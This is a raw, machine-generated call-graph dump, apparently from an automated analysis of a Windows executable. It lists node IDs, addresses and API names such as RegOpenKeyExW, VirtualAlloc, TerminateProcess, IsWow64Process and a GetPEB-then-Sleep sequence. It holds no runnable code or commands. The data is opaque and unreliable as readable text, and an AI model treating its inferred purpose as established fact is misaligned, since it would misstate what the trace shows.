95861 35da85 __fread_nolock 95856->95861 95858 3627ec _abort 26 API calls 95857->95858 95858->95859 95864 364a56 62 API calls 95859->95864 95860 35dc0b 62 API calls 95860->95861 95861->95859 95861->95860 95862 35d955 __fread_nolock 26 API calls 95861->95862 95863 3659be __wsopen_s 62 API calls 95861->95863 95862->95861 95863->95861 95864->95842 95865->95795 95867 35e624 95866->95867 95868 35e60f 95866->95868 95873 35e61f 95867->95873 95885 35dc0b 95867->95885 95910 35f2d9 20 API calls _abort 95868->95910 95870 35e614 95911 3627ec 26 API calls _abort 95870->95911 95873->95797 95877 35d955 __fread_nolock 26 API calls 95878 35e646 95877->95878 95895 36862f 95878->95895 95881 3629c8 _free 20 API calls 95881->95873 95882->95792 95883->95799 95884->95799 95886 35dc23 95885->95886 95890 35dc1f 95885->95890 95887 35d955 __fread_nolock 26 API calls 95886->95887 95886->95890 95888 35dc43 95887->95888 95912 3659be 95888->95912 95891 364d7a 95890->95891 95892 35e640 95891->95892 95893 364d90 95891->95893 95892->95877 95893->95892 95894 3629c8 _free 20 API calls 95893->95894 95894->95892 95896 368653 95895->95896 95897 36863e 95895->95897 95899 36868e 95896->95899 95902 36867a 95896->95902 96035 35f2c6 20 API calls _abort 95897->96035 96037 35f2c6 20 API calls _abort 95899->96037 95901 368643 96036 35f2d9 20 API calls _abort 95901->96036 96032 368607 95902->96032 95903 368693 96038 35f2d9 20 API calls _abort 95903->96038 95907 35e64c 95907->95873 95907->95881 95908 36869b 96039 3627ec 26 API calls _abort 95908->96039 95910->95870 95911->95873 95913 3659ca ___DestructExceptionObject 95912->95913 95914 3659d2 95913->95914 95915 3659ea 95913->95915 95991 35f2c6 20 API calls _abort 95914->95991 95916 365a88 95915->95916 95920 365a1f 95915->95920 95996 35f2c6 20 API calls _abort 95916->95996 95919 3659d7 95992 35f2d9 20 API calls _abort 95919->95992 95937 365147 EnterCriticalSection 95920->95937 95921 365a8d 95997 35f2d9 20 API calls _abort 95921->95997 95923 3659df __wsopen_s 95923->95890 95926 365a25 95928 365a56 95926->95928 95929 365a41 95926->95929 95927 365a95 95998 3627ec 26 API calls _abort 95927->95998 95938 365aa9 95928->95938 95993 35f2d9 20 API calls _abort 95929->95993 95933 365a46 95994 35f2c6 20 API calls _abort 95933->95994 95935 365a51 95995 365a80 LeaveCriticalSection __wsopen_s 95935->95995 95937->95926 95939 365ad7 95938->95939 95977 365ad0 95938->95977 95940 365afa 95939->95940 95941 365adb 95939->95941 95945 365b4b 95940->95945 95946 365b2e 95940->95946 96006 35f2c6 20 API calls _abort 95941->96006 95944 365ae0 96007 35f2d9 20 API calls _abort 95944->96007 95949 365b61 95945->95949 96012 369424 28 API calls __wsopen_s 95945->96012 96009 35f2c6 20 API calls _abort 95946->96009 95947 365cb1 95947->95935 95999 36564e 95949->95999 95954 365b33 96023 350a8c 95977->96023 95991->95919 95992->95923 95993->95933 95994->95935 95995->95923 95996->95921 95997->95927 95998->95923 96006->95944 96009->95954 96012->95949 96024 350a95 96023->96024 96025 350a97 IsProcessorFeaturePresent 96023->96025 96024->95947 96027 350c5d 96025->96027 96031 350c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96027->96031 96040 368585 96032->96040 96035->95901 96036->95907 96037->95903 96038->95908 96039->95907 96041 368591 ___DestructExceptionObject 96040->96041 96051 365147 EnterCriticalSection 96041->96051 96043 36859f 96044 3685c6 96043->96044 96045 3685d1 96043->96045 96052 3686ae 96044->96052 96067 35f2d9 20 API calls _abort 96045->96067 96048 3685cc 96051->96043 96069 3653c4 96052->96069 96067->96048 96089 333156 96092 333170 96089->96092 96093 333187 96092->96093 96094 3331eb 96093->96094 96095 33318c 96093->96095 96096 3331e9 96093->96096 96100 3331f1 96094->96100 96101 372dfb 96094->96101 96097 333265 PostQuitMessage 96095->96097 96098 333199 96095->96098 96099 3331d0 DefWindowProcW 96096->96099 96105 33316a 96097->96105 96103 3331a4 96098->96103 96104 372e7c 96098->96104 96099->96105 96106 3331f8 96100->96106 96107 33321d SetTimer RegisterWindowMessageW 96100->96107 96141 3318e2 10 API calls 96101->96141 96109 3331ae 96103->96109 96110 372e68 96103->96110 96156 39bf30 34 API calls ___scrt_fastfail 96104->96156 96113 333201 KillTimer 96106->96113 96114 372d9c 96106->96114 96107->96105 96111 333246 CreatePopupMenu 96107->96111 96108 372e1c 96142 34e499 42 API calls 96108->96142 96117 372e4d 96109->96117 96118 3331b9 96109->96118 96155 39c161 27 API calls ___scrt_fastfail 96110->96155 96111->96105 96137 3330f2 Shell_NotifyIconW ___scrt_fastfail 96113->96137 96120 372dd7 MoveWindow 96114->96120 96121 372da1 96114->96121 96117->96099 96154 390ad7 22 API calls 96117->96154 96125 3331c4 96118->96125 96126 333253 96118->96126 96119 372e8e 96119->96099 96119->96105 96120->96105 96127 372da7 96121->96127 96128 372dc6 SetFocus 96121->96128 96123 333214 96138 333c50 DeleteObject DestroyWindow 96123->96138 96124 333263 96124->96105 96125->96099 96143 3330f2 Shell_NotifyIconW ___scrt_fastfail 96125->96143 96139 33326f 44 API calls ___scrt_fastfail 96126->96139 96127->96125 96131 372db0 96127->96131 96128->96105 96140 3318e2 10 API calls 96131->96140 96135 372e41 96144 333837 96135->96144 96137->96123 96138->96105 96139->96124 96140->96105 96141->96108 96142->96125 96143->96135 96145 333862 ___scrt_fastfail 96144->96145 96157 334212 96145->96157 96148 3338e8 96150 373386 Shell_NotifyIconW 96148->96150 96151 333906 Shell_NotifyIconW 96148->96151 96161 333923 96151->96161 96153 33391c 96153->96096 96154->96096 96155->96124 96156->96119 96158 3735a4 96157->96158 96159 3338b7 96157->96159 96158->96159 96160 3735ad DestroyIcon 96158->96160 96159->96148 96183 39c874 42 API calls _strftime 96159->96183 96160->96159 96162 33393f 96161->96162 96181 333a13 96161->96181 96163 336270 22 API calls 96162->96163 96164 33394d 96163->96164 96165 373393 LoadStringW 96164->96165 96166 33395a 96164->96166 96168 3733ad 96165->96168 96167 336b57 22 API calls 96166->96167 96169 33396f 96167->96169 96172 33a8c7 22 API calls 96168->96172 96176 333994 ___scrt_fastfail 96168->96176 96170 3733c9 96169->96170 96171 33397c 96169->96171 96174 336350 22 API calls 96170->96174 96171->96168 96173 333986 96171->96173 96172->96176 96175 336350 22 API calls 96173->96175 96177 3733d7 96174->96177 96175->96176 96179 3339f9 Shell_NotifyIconW 96176->96179 96177->96176 96184 3333c6 96177->96184 96179->96181 96180 3733f9 96182 3333c6 22 API calls 96180->96182 96181->96153 96182->96176 96183->96148 96185 3730bb 96184->96185 96186 3333dd 96184->96186 96188 34fddb 22 API calls 96185->96188 96193 3333ee 96186->96193 96190 3730c5 _wcslen 96188->96190 96189 3333e8 96189->96180 96191 34fe0b 22 API calls 96190->96191 96192 3730fe __fread_nolock 96191->96192 96194 3333fe _wcslen 96193->96194 96195 333411 96194->96195 96196 37311d 96194->96196 96198 33a587 22 API calls 96195->96198 96197 34fddb 22 API calls 96196->96197 96199 373127 96197->96199 96200 33341e __fread_nolock 96198->96200 96201 34fe0b 22 API calls 96199->96201 96200->96189 96202 373157 __fread_nolock 96201->96202 96203 33105b 96208 33344d 96203->96208 96205 33106a 96239 3500a3 29 API calls __onexit 96205->96239 96207 331074 96209 33345d __wsopen_s 96208->96209 96210 33a961 22 API calls 96209->96210 96211 333513 96210->96211 96212 333a5a 24 API calls 96211->96212 96213 33351c 96212->96213 96240 333357 96213->96240 96216 3333c6 22 API calls 96217 333535 96216->96217 96218 33515f 22 API calls 96217->96218 96219 333544 96218->96219 96220 33a961 22 API calls 96219->96220 96221 33354d 96220->96221 96222 33a6c3 22 API calls 96221->96222 96223 333556 RegOpenKeyExW 96222->96223 96224 373176 RegQueryValueExW 96223->96224 96228 333578 96223->96228 96225 373193 96224->96225 96226 37320c RegCloseKey 96224->96226 96227 34fe0b 22 API calls 96225->96227 96226->96228 96231 37321e _wcslen 96226->96231 96229 3731ac 96227->96229 96228->96205 96230 335722 22 API calls 96229->96230 96232 3731b7 RegQueryValueExW 96230->96232 96231->96228 96233 334c6d 22 API calls 96231->96233 96237 339cb3 22 API calls 96231->96237 96238 33515f 22 API calls 96231->96238 96234 3731d4 96232->96234 96235 3731ee ISource 96232->96235 96233->96231 96236 336b57 22 API calls 96234->96236 96235->96226 96236->96235 96237->96231 96238->96231 96239->96207 96241 371f50 __wsopen_s 96240->96241 96242 333364 GetFullPathNameW 96241->96242 96243 333386 96242->96243 96244 336b57 22 API calls 96243->96244 96245 3333a4 96244->96245 96245->96216 96246 13823b0 96247 1380000 GetPEB 96246->96247 96248 138245b 96247->96248 96260 13822a0 96248->96260 96261 13822a9 Sleep 96260->96261 96262 13822b7 96261->96262 96263 331098 96268 3342de 96263->96268 96267 3310a7 96269 33a961 22 API calls 96268->96269 96270 3342f5 GetVersionExW 96269->96270 96271 336b57 22 API calls 96270->96271 96272 334342 96271->96272 96273 3393b2 22 API calls 96272->96273 96282 334378 96272->96282 96274 33436c 96273->96274 96276 3337a0 22 API calls 96274->96276 96275 33441b GetCurrentProcess IsWow64Process 96277 334437 96275->96277 96276->96282 96278 373824 GetSystemInfo 96277->96278 96279 33444f LoadLibraryA 96277->96279 96280 334460 GetProcAddress 96279->96280 96281 33449c GetSystemInfo 96279->96281 96280->96281 96284 334470 GetNativeSystemInfo 96280->96284 96285 334476 96281->96285 96282->96275 96283 3737df 96282->96283 96284->96285 96286 33109d 96285->96286 96287 33447a FreeLibrary 96285->96287 96288 3500a3 29 API calls __onexit 96286->96288 96287->96286 96288->96267 96289 3690fa 96290 369107 96289->96290 96293 36911f 96289->96293 96339 35f2d9 20 API calls _abort 96290->96339 96292 36910c 96340 3627ec 26 API calls _abort 96292->96340 96295 36917a 96293->96295 96303 369117 96293->96303 96341 36fdc4 21 API calls 2 library calls 96293->96341 96297 35d955 __fread_nolock 26 API calls 96295->96297 96298 369192 96297->96298 96309 368c32 96298->96309 96300 369199 96301 35d955 __fread_nolock 26 API calls 96300->96301 96300->96303 96302 3691c5 96301->96302 96302->96303 96304 35d955 __fread_nolock 26 API calls 96302->96304 96305 3691d3 96304->96305 96305->96303 96306 35d955 __fread_nolock 26 API calls 96305->96306 96307 3691e3 96306->96307 96308 35d955 __fread_nolock 26 API calls 96307->96308 96308->96303 96310 368c3e ___DestructExceptionObject 96309->96310 96311 368c46 96310->96311 96312 368c5e 96310->96312 96343 35f2c6 20 API calls _abort 96311->96343 96314 368d24 96312->96314 96318 368c97 96312->96318 96350 35f2c6 20 API calls _abort 96314->96350 96315 368c4b 96344 35f2d9 20 API calls _abort 96315->96344 96321 368ca6 96318->96321 96322 368cbb 96318->96322 96319 368d29 96351 35f2d9 20 API calls _abort 96319->96351 96345 35f2c6 20 API calls _abort 96321->96345 96342 365147 EnterCriticalSection 96322->96342 96324 368cb3 96352 3627ec 26 API calls _abort 96324->96352 96326 368cc1 96328 368cf2 96326->96328 96329 368cdd 96326->96329 96327 368cab 96346 35f2d9 20 API calls _abort 96327->96346 96334 368d45 __fread_nolock 38 API calls 96328->96334 96347 35f2d9 20 API calls _abort 96329->96347 96331 368c53 __wsopen_s 96331->96300 96336 368ced 96334->96336 96335 368ce2 96348 35f2c6 20 API calls _abort 96335->96348 96349 368d1c LeaveCriticalSection __wsopen_s 96336->96349 96339->96292 96340->96303 96341->96295 96342->96326 96343->96315 96344->96331 96345->96327 96346->96324 96347->96335 96348->96336 96349->96331 96350->96319 96351->96324 96352->96331 96353 33f7bf 96354 33f7d3 96353->96354 96355 33fcb6 96353->96355 96356 33fcc2 96354->96356 96358 34fddb 22 API calls 96354->96358 96446 33aceb 23 API calls ISource 96355->96446 96447 33aceb 23 API calls ISource 96356->96447 96360 33f7e5 96358->96360 96360->96356 96361 33f83e 96360->96361 96362 33fd3d 96360->96362 96381 33ed9d ISource 96361->96381 96388 341310 96361->96388 96448 3a1155 22 API calls 96362->96448 96365 384beb 96452 3a359c 82 API calls __wsopen_s 96365->96452 96366 33fef7 96376 33a8c7 22 API calls 96366->96376 96366->96381 96368 34fddb 22 API calls 96372 33ec76 ISource 96368->96372 96370 33f3ae ISource 96370->96381 96449 3a359c 82 API calls __wsopen_s 96370->96449 96371 384600 96378 33a8c7 22 API calls 96371->96378 96371->96381 96372->96365 96372->96366 96372->96368 96372->96370 96372->96371 96373 384b0b 96372->96373 96374 33a8c7 22 API calls 96372->96374 96380 350242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96372->96380 96372->96381 96382 33a961 22 API calls 96372->96382 96383 33fbe3 96372->96383 96386 3501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96372->96386 96387 3500a3 29 API calls pre_c_initialization 96372->96387 96444 3401e0 239 API calls 2 library calls 96372->96444 96445 3406a0 41 API calls ISource 96372->96445 96450 3a359c 82 API calls __wsopen_s 96373->96450 96374->96372 96376->96381 96378->96381 96380->96372 96382->96372 96383->96370 96383->96381 96384 384bdc 96383->96384 96451 3a359c 82 API calls __wsopen_s 96384->96451 96386->96372 96387->96372 96389 341376 96388->96389 96390 3417b0 96388->96390 96391 341390 96389->96391 96392 386331 96389->96392 96593 350242 5 API calls __Init_thread_wait 96390->96593 96453 341940 96391->96453 96598 3b709c 239 API calls 96392->96598 96396 3417ba 96399 3417fb 96396->96399 96401 339cb3 22 API calls 96396->96401 96398 38633d 96398->96372 96403 386346 96399->96403 96405 34182c 96399->96405 96400 341940 9 API calls 96402 3413b6 96400->96402 96408 3417d4 96401->96408 96402->96399 96404 3413ec 96402->96404 96599 3a359c 82 API calls __wsopen_s 96403->96599 96404->96403 96428 341408 __fread_nolock 96404->96428 96595 33aceb 23 API calls ISource 96405->96595 96594 3501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96408->96594 96409 341839 96596 34d217 239 API calls 96409->96596 96412 38636e 96600 3a359c 82 API calls __wsopen_s 96412->96600 96413 34152f 96415 34153c 96413->96415 96416 3863d1 96413->96416 96418 341940 9 API calls 96415->96418 96602 3b5745 54 API calls _wcslen 96416->96602 96419 341549 96418->96419 96423 3864fa 96419->96423 96425 341940 9 API calls 96419->96425 96420 34fddb 22 API calls 96420->96428 96421 341872 96597 34faeb 23 API calls 96421->96597 96422 34fe0b 22 API calls 96422->96428 96432 386369 96423->96432 96603 3a359c 82 API calls __wsopen_s 96423->96603 96430 341563 96425->96430 96427 33ec40 239 API calls 96427->96428 96428->96409 96428->96412 96428->96413 96428->96420 96428->96422 96428->96427 96429 3863b2 96428->96429 96428->96432 96601 3a359c 82 API calls __wsopen_s 96429->96601 96430->96423 96433 33a8c7 22 API calls 96430->96433 96435 3415c7 ISource 96430->96435 96432->96372 96433->96435 96434 341940 9 API calls 96434->96435 96435->96421 96435->96423 96435->96432 96435->96434 96438 34167b ISource 96435->96438 96463 3bd482 96435->96463 96503 3b958b 96435->96503 96506 39d4ce 96435->96506 96509 3b959f 96435->96509 96512 3a6ef1 96435->96512 96436 34171d 96436->96372 96438->96436 96592 34ce17 22 API calls ISource 96438->96592 96444->96372 96445->96372 96446->96356 96447->96362 96448->96381 96449->96381 96450->96381 96451->96365 96452->96381 96454 341981 96453->96454 96461 34195d 96453->96461 96604 350242 5 API calls __Init_thread_wait 96454->96604 96455 3413a0 96455->96400 96457 34198b 96457->96461 96605 3501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96457->96605 96459 348727 96459->96455 96607 3501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96459->96607 96461->96455 96606 350242 5 API calls __Init_thread_wait 96461->96606 96608 3a1e96 96463->96608 96465 3bd49d 96466 3bd4ee 96465->96466 96467 3bd4b1 96465->96467 96470 3bd4fc 96466->96470 96639 33b567 39 API calls 96466->96639 96638 339c6e 22 API calls 96467->96638 96471 3bd548 96470->96471 96472 3bd51f 96470->96472 96473 3bd600 96471->96473 96475 3bd55a 96471->96475 96640 339c6e 22 API calls 96472->96640 96612 34f1d8 96473->96612 96477 3bd55f 96475->96477 96478 3bd59d 96475->96478 96480 336270 22 API calls 96477->96480 96481 34fe0b 22 API calls 96478->96481 96485 3bd572 96480->96485 96483 3bd5a3 96481->96483 96489 336270 22 API calls 96483->96489 96484 3bd619 96486 336270 22 API calls 96484->96486 96641 336e90 96485->96641 96488 3bd623 96486->96488 96491 3bd630 96488->96491 96492 3bd637 96488->96492 96493 3bd5dd 96489->96493 96490 3bd582 96653 3362b5 22 API calls 96490->96653 96630 336d9e MultiByteToWideChar 96491->96630 96655 336e14 24 API calls 96492->96655 96496 336e90 22 API calls 96493->96496 96499 3bd5ea 96496->96499 96498 3bd635 96656 3362b5 22 API calls 96498->96656 96654 3362b5 22 API calls 96499->96654 96502 3bd4be 96502->96435 96661 3b7f59 96503->96661 96505 3b959b 96505->96435 96794 39dbbe lstrlenW 96506->96794 96510 3b7f59 120 API calls 96509->96510 96511 3b95af 96510->96511 96511->96435 96513 33a961 22 API calls 96512->96513 96514 3a6f1d 96513->96514 96515 33a961 22 API calls 96514->96515 96516 3a6f26 96515->96516 96517 3a6f3a 96516->96517 96950 33b567 39 API calls 96516->96950 96519 337510 53 API calls 96517->96519 96524 3a6f57 _wcslen 96519->96524 96520 3a70bf 96523 334ecb 94 API calls 96520->96523 96521 3a6fbc 96522 337510 53 API calls 96521->96522 96525 3a6fc8 96522->96525 96526 3a70d0 96523->96526 96524->96520 96524->96521 96532 3a70e9 96524->96532 96530 33a8c7 22 API calls 96525->96530 96534 3a6fdb 96525->96534 96527 3a70e5 96526->96527 96528 334ecb 94 API calls 96526->96528 96529 33a961 22 API calls 96527->96529 96527->96532 96528->96527 96531 3a711a 96529->96531 96530->96534 96533 33a961 22 API calls 96531->96533 96532->96435 96537 3a7126 96533->96537 96535 3a7027 96534->96535 96538 3a7005 96534->96538 96539 33a8c7 22 API calls 96534->96539 96536 337510 53 API calls 96535->96536 96541 3a7034 96536->96541 96542 33a961 22 API calls 96537->96542 96540 3333c6 22 API calls 96538->96540 96539->96538 96543 3a700f 96540->96543 96544 3a703d 96541->96544 96545 3a7047 96541->96545 96546 3a712f 96542->96546 96547 337510 53 API calls 96543->96547 96548 33a8c7 22 API calls 96544->96548 96951 39e199 GetFileAttributesW 96545->96951 96550 33a961 22 API calls 96546->96550 96551 3a701b 96547->96551 96548->96545 96553 3a7138 96550->96553 96555 336350 22 API calls 96551->96555 96552 3a7050 96556 3a7063 96552->96556 96557 334c6d 22 API calls 96552->96557 96554 337510 53 API calls 96553->96554 96558 3a7145 96554->96558 96555->96535 96559 337510 53 API calls 96556->96559 96565 3a7069 96556->96565 96557->96556 96799 33525f 96558->96799 96561 3a70a0 96559->96561 96952 39d076 57 API calls 96561->96952 96562 3a7166 96564 334c6d 22 API calls 96562->96564 96566 3a7175 96564->96566 96565->96532 96567 3a71a9 96566->96567 96568 334c6d 22 API calls 96566->96568 96569 33a8c7 22 API calls 96567->96569 96570 3a7186 96568->96570 96571 3a71ba 96569->96571 96570->96567 96574 336b57 22 API calls 96570->96574 96572 336350 22 API calls 96571->96572 96573 3a71c8 96572->96573 96575 336350 22 API calls 96573->96575 96576 3a719b 96574->96576 96577 3a71d6 96575->96577 96578 336b57 22 API calls 96576->96578 96579 336350 22 API calls 96577->96579 96578->96567 96580 3a71e4 96579->96580 96581 337510 53 API calls 96580->96581 96582 3a71f0 96581->96582 96841 39d7bc 96582->96841 96584 3a7201 96585 39d4ce 4 API calls 96584->96585 96586 3a720b 96585->96586 96587 3a7239 96586->96587 96588 337510 53 API calls 96586->96588 96591 334f39 68 API calls 96587->96591 96589 3a7229 96588->96589 96895 3a2947 96589->96895 96591->96532 96592->96438 96593->96396 96594->96399 96595->96409 96596->96421 96597->96421 96598->96398 96599->96432 96600->96432 96601->96432 96602->96430 96603->96432 96604->96457 96605->96461 96606->96459 96607->96455 96609 3a1e9f 96608->96609 96610 3a1ea4 96608->96610 96657 3a0f67 24 API calls __fread_nolock 96609->96657 96610->96465 96613 34fe0b 22 API calls 96612->96613 96614 34f1ef 96613->96614 96615 34fddb 22 API calls 96614->96615 96616 34f1fb 96615->96616 96617 34f733 96616->96617 96618 34f741 96617->96618 96619 34f77f 96617->96619 96618->96619 96621 34f74c 96618->96621 96659 39ca5b 22 API calls __fread_nolock 96619->96659 96622 38f2fe 96621->96622 96623 34f75a 96621->96623 96625 34fddb 22 API calls 96622->96625 96658 34f788 22 API calls 96623->96658 96627 38f308 96625->96627 96626 34f762 __fread_nolock 96626->96484 96628 34fe0b 22 API calls 96627->96628 96629 38f32d 96628->96629 96631 336dc7 96630->96631 96632 336e0b 96630->96632 96633 34fe0b 22 API calls 96631->96633 96634 33a6c3 22 API calls 96632->96634 96635 336ddc MultiByteToWideChar 96633->96635 96637 336dff 96634->96637 96636 336e90 22 API calls 96635->96636 96636->96637 96637->96498 96638->96502 96639->96470 96640->96502 96642 336ea3 96641->96642 96643 336f24 96641->96643 96642->96643 96645 336eaf 96642->96645 96644 3393b2 22 API calls 96643->96644 96651 336ec1 __fread_nolock 96644->96651 96646 336ee7 96645->96646 96647 336eb9 96645->96647 96648 34fddb 22 API calls 96646->96648 96660 336f34 22 API calls 96647->96660 96650 336ef1 96648->96650 96652 34fe0b 22 API calls 96650->96652 96651->96490 96652->96651 96653->96502 96654->96502 96655->96498 96656->96502 96657->96610 96658->96626 96659->96626 96660->96651 96699 337510 96661->96699 96665 3b8281 96666 3b844f 96665->96666 96671 3b828f 96665->96671 96763 3b8ee4 60 API calls 96666->96763 96669 3b845e 96670 3b846a 96669->96670 96669->96671 96685 3b7fd5 ISource 96670->96685 96735 3b7e86 96671->96735 96672 337510 53 API calls 96689 3b8049 96672->96689 96677 3b82c8 96750 34fc70 96677->96750 96680 3b82e8 96756 3a359c 82 API calls __wsopen_s 96680->96756 96681 3b8302 96757 3363eb 22 API calls 96681->96757 96684 3b8311 96758 336a50 22 API calls 96684->96758 96685->96505 96686 3b82f3 GetCurrentProcess TerminateProcess 96686->96681 96688 3b832a 96698 3b8352 96688->96698 96759 3404f0 22 API calls 96688->96759 96689->96665 96689->96672 96689->96685 96754 39417d 22 API calls __fread_nolock 96689->96754 96755 3b851d 42 API calls _strftime 96689->96755 96691 3b84c5 96691->96685 96693 3b84d9 FreeLibrary 96691->96693 96692 3b8341 96760 3b8b7b 75 API calls 96692->96760 96693->96685 96698->96691 96761 3404f0 22 API calls 96698->96761 96762 33aceb 23 API calls ISource 96698->96762 96764 3b8b7b 75 API calls 96698->96764 96700 337525 96699->96700 96716 337522 96699->96716 96701 33755b 96700->96701 96702 33752d 96700->96702 96705 33756d 96701->96705 96712 3750f6 96701->96712 96714 37500f 96701->96714 96765 3551c6 26 API calls 96702->96765 96766 34fb21 51 API calls 96705->96766 96706 37510e 96706->96706 96708 33753d 96709 34fddb 22 API calls 96708->96709 96711 337547 96709->96711 96713 339cb3 22 API calls 96711->96713 96768 355183 26 API calls 96712->96768 96713->96716 96715 34fe0b 22 API calls 96714->96715 96721 375088 96714->96721 96717 375058 96715->96717 96716->96685 96722 3b8cd3 96716->96722 96718 34fddb 22 API calls 96717->96718 96719 37507f 96718->96719 96720 339cb3 22 API calls 96719->96720 96720->96721 96767 34fb21 51 API calls 96721->96767 96723 33aec9 22 API calls 96722->96723 96724 3b8cee CharLowerBuffW 96723->96724 96769 398e54 96724->96769 96728 33a961 22 API calls 96729 3b8d2a 96728->96729 96776 336d25 96729->96776 96731 3b8d3e 96732 3393b2 22 API calls 96731->96732 96734 3b8d48 _wcslen 96732->96734 96733 3b8e5e _wcslen 96733->96689 96734->96733 96789 3b851d 42 API calls _strftime 96734->96789 96736 3b7ea1 96735->96736 96740 3b7eec 96735->96740 96737 34fe0b 22 API calls 96736->96737 96738 3b7ec3 96737->96738 96739 34fddb 22 API calls 96738->96739 96738->96740 96739->96738 96741 3b9096 96740->96741 96742 3b92ab ISource 96741->96742 96748 3b90ba _strcat _wcslen 96741->96748 96742->96677 96743 33b6b5 39 API calls 96743->96748 96744 33b38f 39 API calls 96744->96748 96745 33b567 39 API calls 96745->96748 96746 337510 53 API calls 96746->96748 96747 35ea0c 21 API calls ___std_exception_copy 96747->96748 96748->96742 96748->96743 96748->96744 96748->96745 96748->96746 96748->96747 96793 39efae 24 API calls _wcslen 96748->96793 96752 34fc85 96750->96752 96751 34fd1d VirtualAlloc 96753 34fceb 96751->96753 96752->96751 96752->96753 96753->96680 96753->96681 96754->96689 96755->96689 96756->96686 96757->96684 96758->96688 96759->96692 96760->96698 96761->96698 96762->96698 96763->96669 96764->96698 96765->96708 96766->96708 96767->96712 96768->96706 96770 398e74 _wcslen 96769->96770 96771 398f63 96770->96771 96774 398ea9 96770->96774 96775 398f68 96770->96775 96771->96728 96771->96734 96774->96771 96790 34ce60 41 API calls 96774->96790 96775->96771 96791 34ce60 41 API calls 96775->96791 96777 336d91 96776->96777 96778 336d34 96776->96778 96780 3393b2 22 API calls 96777->96780 96778->96777 96779 336d3f 96778->96779 96782 336d5a 96779->96782 96783 374c9d 96779->96783 96781 336d62 __fread_nolock 96780->96781 96781->96731 96792 336f34 22 API calls 96782->96792 96785 34fddb 22 API calls 96783->96785 96786 374ca7 96785->96786 96787 34fe0b 22 API calls 96786->96787 96788 374cda 96787->96788 96789->96733 96790->96774 96791->96775 96792->96781 96793->96748 96795 39dbdc GetFileAttributesW 96794->96795 96796 39d4d5 96794->96796 96795->96796 96797 39dbe8 FindFirstFileW 96795->96797 96796->96435 96797->96796 96798 39dbf9 FindClose 96797->96798 96798->96796 96800 33a961 22 API calls 96799->96800 96801 335275 96800->96801 96802 33a961 22 API calls 96801->96802 96803 33527d 96802->96803 96804 33a961 22 API calls 96803->96804 96805 335285 96804->96805 96806 33a961 22 API calls 96805->96806 96807 33528d 96806->96807 96808 373df5 96807->96808 96809 3352c1 96807->96809 96810 33a8c7 22 API calls 96808->96810 96811 336d25 22 API calls 96809->96811 96812 373dfe 96810->96812 96813 3352cf 96811->96813 96814 33a6c3 22 API calls 96812->96814 96815 3393b2 22 API calls 96813->96815 96817 335304 96814->96817 96816 3352d9 96815->96816 96816->96817 96818 336d25 22 API calls 96816->96818 96819 335349 96817->96819 96820 335325 96817->96820 96830 373e20 96817->96830 96822 3352fa 96818->96822 96821 336d25 22 API calls 96819->96821 96820->96819 96825 334c6d 22 API calls 96820->96825 96823 33535a 96821->96823 96824 3393b2 22 API calls 96822->96824 96826 335370 96823->96826 96832 33a8c7 22 API calls 96823->96832 96824->96817 96828 335332 96825->96828 96827 335384 96826->96827 96833 33a8c7 22 API calls 96826->96833 96831 33538f 96827->96831 96835 33a8c7 22 API calls 96827->96835 96828->96819 96834 336d25 22 API calls 96828->96834 96829 336b57 22 API calls 96838 373ee0 96829->96838 96830->96829 96836 33a8c7 22 API calls 96831->96836 96840 33539a 96831->96840 96832->96826 96833->96827 96834->96819 96835->96831 96836->96840 96837 334c6d 22 API calls 96837->96838 96838->96819 96838->96837 96953 3349bd 22 API calls __fread_nolock 96838->96953 96840->96562 96842 39d7d8 96841->96842 96843 39d7dd 96842->96843 96844 39d7f3 96842->96844 96846 39d7ee 96843->96846 96848 33a8c7 22 API calls 96843->96848 96845 33a961 22 API calls 96844->96845 96847 39d7fb 96845->96847 96846->96584 96849 33a961 22 API calls 96847->96849 96848->96846 96850 39d803 96849->96850 96851 33a961 22 API calls 96850->96851 96852 39d80e 96851->96852 96853 33a961 22 API calls 96852->96853 96854 39d816 96853->96854 96855 33a961 22 API calls 96854->96855 96856 39d81e 96855->96856 96857 33a961 22 API calls 96856->96857 96858 39d826 96857->96858 96859 33a961 22 API calls 96858->96859 96860 39d82e 96859->96860 96861 33a961 22 API calls 96860->96861 96862 39d836 96861->96862 96863 33525f 22 API calls 96862->96863 96864 39d84d 96863->96864 96865 33525f 22 API calls 96864->96865 96866 39d866 96865->96866 96867 334c6d 22 API calls 96866->96867 96868 39d872 96867->96868 96869 39d885 96868->96869 96870 3393b2 22 API calls 96868->96870 96871 334c6d 22 API calls 96869->96871 96870->96869 96872 39d88e 96871->96872 96873 39d89e 96872->96873 96874 3393b2 22 API calls 96872->96874 96875 39d8b0 96873->96875 96876 33a8c7 22 API calls 96873->96876 96874->96873 96877 336350 22 API calls 96875->96877 96876->96875 96878 39d8bb 96877->96878 96954 39d978 22 API calls 96878->96954 96880 39d8ca 96955 39d978 22 API calls 96880->96955 96882 39d8dd 96883 334c6d 22 API calls 96882->96883 96884 39d8e7 96883->96884 96885 39d8ec 96884->96885 96886 39d8fe 96884->96886 96887 3333c6 22 API calls 96885->96887 96888 334c6d 22 API calls 96886->96888 96894 39d8f9 96887->96894 96889 39d907 96888->96889 96890 39d925 96889->96890 96891 3333c6 22 API calls 96889->96891 96893 336350 22 API calls 96890->96893 96891->96894 96892 336350 22 API calls 96892->96890 96893->96846 96894->96892 96896 3a2954 __wsopen_s 96895->96896 96897 34fe0b 22 API calls 96896->96897 96898 3a2971 96897->96898 96899 335722 22 API calls 96898->96899 96900 3a297b 96899->96900 96901 3a274e 27 API calls 96900->96901 96902 3a2986 96901->96902 96903 33511f 64 API calls 96902->96903 96904 3a299b 96903->96904 96905 3a29bf 96904->96905 96906 3a2a6c 96904->96906 96907 3a2e66 75 API calls 96905->96907 96908 3a2e66 75 API calls 96906->96908 96909 3a29c4 96907->96909 96910 3a2a38 96908->96910 96914 3a2a75 ISource 96909->96914 96960 35d583 26 API calls 96909->96960 96912 3350f5 40 API calls 96910->96912 96910->96914 96913 3a2a91 96912->96913 96915 3350f5 40 API calls 96913->96915 96914->96587 96917 3a2aa1 96915->96917 96916 3a29ed 96961 35d583 26 API calls 96916->96961 96918 3350f5 40 API calls 96917->96918 96920 3a2abc 96918->96920 96921 3350f5 40 